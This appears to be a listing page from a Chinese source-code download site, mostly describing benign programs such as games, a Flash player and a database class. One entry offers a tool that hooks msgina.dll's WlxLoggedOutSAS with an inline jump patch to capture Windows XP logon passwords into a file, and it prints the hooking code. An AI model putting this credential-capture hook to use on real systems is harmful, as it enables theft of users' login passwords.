-
Video programming to capture surveillance video data, C/c++ program
视频编程 捕获监控视频数据 C/c++程序-Video programming to capture surveillance video data, C/c++ program
- 2023-02-17 11:50:04下载
- 积分:1
-
genalogic树在C
Genalogic tree made in c-Genalogic tree made in c++
- 2022-01-26 04:02:44下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
进行数据库操作的类库。
通过带参数的sql和HashTable操作数据库。
主要功能:
ExcuteSql:执行Sql
GetRecord:查询...
进行数据库操作的类库。
通过带参数的sql和HashTable操作数据库。
主要功能:
ExcuteSql:执行Sql
GetRecord:查询数据库,返回DataTable-The class library for database operations. Through with the parameters and the sql database HashTable operation. Main functions: ExcuteSql: the implementation of Sql GetRecord: query the database, return DataTable
- 2022-05-17 10:20:28下载
- 积分:1
-
vc++开发的flash播放器能够实现一部分功能
vc++开发的flash播放器能够实现一部分功能-vc++ developed flash player can be realized as part of the functional
- 2022-04-21 16:55:03下载
- 积分:1
-
use a browser control Delphi examples
一个使用Delphi控制浏览器的例子-use a browser control Delphi examples
- 2022-02-03 00:16:00下载
- 积分:1
-
VB二维打飞机游戏
应用背景打飞机(Fighter)是一款有趣又益智的游戏。它可以培养游戏者的逻辑推理能力,适合各种年龄段的人玩。
该游戏原本是我读本科时在宿舍里和同学一起玩的。需要两人以上合作,互相布局互相“开炮”。非常好玩。这次,我把游戏改成计算机版本,(可选计算机自动布局和手动布局两种模式),可以单机玩,也可以由别人布局在由你玩。关键技术二维打飞机小游戏源代码,十分简单的游戏,a控制向左,d控制向右。w控制向前,s控制向后,鼠标点击发射子弹,每次打中会有相应的子弹报酬,最后子弹或者生命完了后游戏结束,
- 2022-02-20 05:06:07下载
- 积分:1
-
极品贪吃蛇
应用背景休闲娱乐小游戏,用简单的代码创造更多的乐趣,这是基于C++的一款适合大学生。初学者参考的小代码 ,希望大家喜欢,新人送上关键技术这是基于C++,中间参加WINDOWS等程序编译,每段程序后都有备注,简单明了
- 2022-06-16 09:25:41下载
- 积分:1
-
Tht mainframe of the program is heart
程序的主框架窗口为心型,比较有创意-Tht mainframe of the program is heart-shape, which seems creative.
- 2022-11-21 04:25:03下载
- 积分:1
-
With a leap year, key adjustment, automatic power
带闰年,按键调整,掉电后可自动运行,掉电保护功能-With a leap year, key adjustment, automatic power-down operation, power-down protection
- 2023-03-03 06:25:04下载
- 积分:1